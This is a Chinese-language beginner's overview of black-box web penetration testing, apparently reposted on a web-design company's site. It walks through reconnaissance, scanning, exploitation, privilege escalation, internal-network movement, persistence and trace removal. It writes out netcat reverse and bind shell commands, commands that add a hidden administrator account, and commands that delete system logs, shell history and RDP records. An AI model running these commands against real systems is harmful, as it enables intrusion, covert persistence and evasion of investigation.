怎么實(shí)現(xiàn)Web滲透的分析,相信很多沒有經(jīng)驗(yàn)的人對此束手無策,為此本文總結(jié)了問題出現(xiàn)的原因和解決方法,通過這篇文章希望你能解決這個(gè)問題。
創(chuàng)新互聯(lián)建站秉承實(shí)現(xiàn)全網(wǎng)價(jià)值營銷的理念,以專業(yè)定制企業(yè)官網(wǎng),成都網(wǎng)站設(shè)計(jì)、網(wǎng)站建設(shè)、外貿(mào)網(wǎng)站建設(shè),重慶小程序開發(fā),網(wǎng)頁設(shè)計(jì)制作,手機(jī)網(wǎng)站開發(fā),全網(wǎng)整合營銷推廣幫助傳統(tǒng)企業(yè)實(shí)現(xiàn)“互聯(lián)網(wǎng)+”轉(zhuǎn)型升級專業(yè)定制企業(yè)官網(wǎng),公司注重人才、技術(shù)和管理,匯聚了一批優(yōu)秀的互聯(lián)網(wǎng)技術(shù)人才,對客戶都以感恩的心態(tài)奉獻(xiàn)自己的專業(yè)和所長。
Web滲透測試分為白盒測試和黑盒測試,白盒測試是指目標(biāo)網(wǎng)站的源碼等信息的情況下對其滲透,相當(dāng)于代碼分析審計(jì)。而黑盒測試則是在對該網(wǎng)站系統(tǒng)信息不知情的情況下滲透,以下所說的Web滲透就是黑盒滲透。Web滲透分為以下幾個(gè)步驟,信息收集,漏洞掃描,漏洞利用,提權(quán),內(nèi)網(wǎng)滲透,留后門,清理痕跡。一般的滲透思路就是看是否有注入漏洞,然后注入得到后臺管理員賬號密碼,登錄后臺,上傳小馬,再通過小馬上傳大馬,提權(quán),內(nèi)網(wǎng)轉(zhuǎn)發(fā),進(jìn)行內(nèi)網(wǎng)滲透,掃描內(nèi)網(wǎng)c段存活主機(jī)及開放端口,看其主機(jī)有無可利用漏洞(nessus)端口(nmap)對應(yīng)服務(wù)及可能存在的漏洞,對其利用(msf)拿下內(nèi)網(wǎng),留下后門,清理痕跡?;蛘呖词欠裼猩蟼魑募牡胤剑蟼饕痪湓捘抉R,再用菜刀鏈接,拿到數(shù)據(jù)庫并可執(zhí)行cmd命令,可繼續(xù)上大馬.........思路很多,很多時(shí)候成不成功可能就是一個(gè)思路的問題,技術(shù)可以不高,思路一定得騷。
信息收集信息收集是整個(gè)流程的重中之重,前期信息收集的越多,Web滲透的成功率就越高。DNS域名信息:通過url獲取其真實(shí)ip,子域名(Layer子域名爆破機(jī)),旁站(K8旁站,御劍1.5),c段,網(wǎng)站負(fù)責(zé)人及其信息(whois查詢)整站信息:服務(wù)器操作系統(tǒng)、服務(wù)器類型及版本(Apache/Nginx/Tomcat/IIS)、數(shù)據(jù)庫類型(MySQL/Oracle/Accees/Mqlserver)、腳本類型(php/jsp/asp/aspx)、CMS類型;網(wǎng)站常見搭配為:ASP和ASPX:ACCESS、SQLServerPHP:MySQL、PostgreSQLJSP:Oracle、MySQL敏感目錄信息(御劍,dirbust)開放端口信息(nmp)
漏洞掃描利用AWVS,AppScan,OWASP-ZAP,等可對網(wǎng)站進(jìn)行網(wǎng)站漏洞的初步掃描,看其是否有可利用漏洞。常見漏洞:SQL注入XSS跨站腳本CSRF跨站請求偽造XXE(XML外部實(shí)體注入)漏洞SSRF(服務(wù)端請求偽造)漏洞文件包含漏洞文件上傳漏洞文件解析漏洞遠(yuǎn)程代碼執(zhí)行漏洞CORS跨域資源共享漏洞越權(quán)訪問漏洞目錄遍歷漏洞和任意文件讀取/下載漏洞
漏洞利用用工具也好什么也好對相應(yīng)漏洞進(jìn)行利用如:Sql注入(sqlmap)XSS(BEEF)后臺密碼爆破(burp)端口爆破(hydra)
提權(quán)獲得shell之后我們權(quán)限可能很低,因此要對自己提權(quán),可以根據(jù)服務(wù)器版本對應(yīng)的exp進(jìn)行提權(quán),對于Windows系統(tǒng)也可看其補(bǔ)丁對應(yīng)漏洞的exp進(jìn)行提權(quán)
內(nèi)網(wǎng)滲透首先進(jìn)行端口轉(zhuǎn)發(fā)可用ncnc使用方法:反向連接在公網(wǎng)主機(jī)上進(jìn)行監(jiān)聽:nc-lvp 4444在內(nèi)網(wǎng)主機(jī)上執(zhí)行:nc-e cmd.exe 公網(wǎng)主機(jī)ip4444成功之后即可得到一個(gè)內(nèi)網(wǎng)主機(jī)shell正向連接遠(yuǎn)程主機(jī)上執(zhí)行:nc-l -p 4444 -t -e cmd.exe本地主機(jī)上執(zhí)行:nc-vv 遠(yuǎn)程主機(jī)ip4444成功后,本地主機(jī)即可遠(yuǎn)程主機(jī)的一個(gè)shell然后就是對內(nèi)網(wǎng)進(jìn)行滲透了,可以用主機(jī)漏洞掃描工具(nessus,x-scan等)進(jìn)行掃描看是否有可用漏洞,可用msf進(jìn)行利用,或者用nmap掃描存活主機(jī)及開放端口,可用hydra進(jìn)行端口爆破或者用msf對端口對應(yīng)漏洞得到shell拿下內(nèi)網(wǎng)留后門
留后門對于網(wǎng)站上傳一句話木馬,留下后門對于windows用戶可用hideadmin創(chuàng)建一個(gè)超級隱藏賬戶手工:netuser test$ 123456 /addnetlocalgroup administrators test$ /add這樣的話在cmd命令中看不到,但在控制面板可以看到,還需要改注冊表才能實(shí)現(xiàn)控制版面也看不到,太過麻煩,不多贅述,所以還是用工具省心省力。
痕跡清理日志清理:在win環(huán)境下的話用msf清理,命令如下:runclearlogsclearev如果在Liunx環(huán)境下:rm-f -r /var/log刪除/var/log下的文件exportHISTSIZE=0export HISTSIZE=0刪除bashshell保存的最后500條命令3389遠(yuǎn)程登陸記錄清除:@echooff@regdelete "HKEY_CURRENT_USER\Software\Microsoft\TerminalServerClient\Default" /va /f@del"%USERPROFILE%\My Documents\Default.rdp" /a@exit另外在滲透時(shí)盡量用代理以免輕易的暴露自己ip。本人呢,也是個(gè)剛?cè)氚踩Φ牟穗u,以上是在學(xué)習(xí)中對滲透過程的一點(diǎn)總結(jié),大牛勿噴,希望可以幫到那些剛剛?cè)腴T的信息安全愛好者。
相關(guān)練習(xí)滲透綜合場景演練:利用自己學(xué)習(xí)到的知識對目標(biāo)進(jìn)行滲透測試,獲取目標(biāo)系統(tǒng)的權(quán)限,從而獲取敏感信息,那么恭喜你,你已經(jīng)完成了從安全小白到滲透測試工程師的蛻變。
看完上述內(nèi)容,你們掌握怎么實(shí)現(xiàn)Web滲透的分析的方法了嗎?如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝各位的閱讀!
當(dāng)前題目:怎么實(shí)現(xiàn)Web滲透的分析
文章網(wǎng)址:http://chinadenli.net/article34/jiiise.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供微信公眾號、網(wǎng)站設(shè)計(jì)、App設(shè)計(jì)、網(wǎng)站內(nèi)鏈、營銷型網(wǎng)站建設(shè)、云服務(wù)器
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)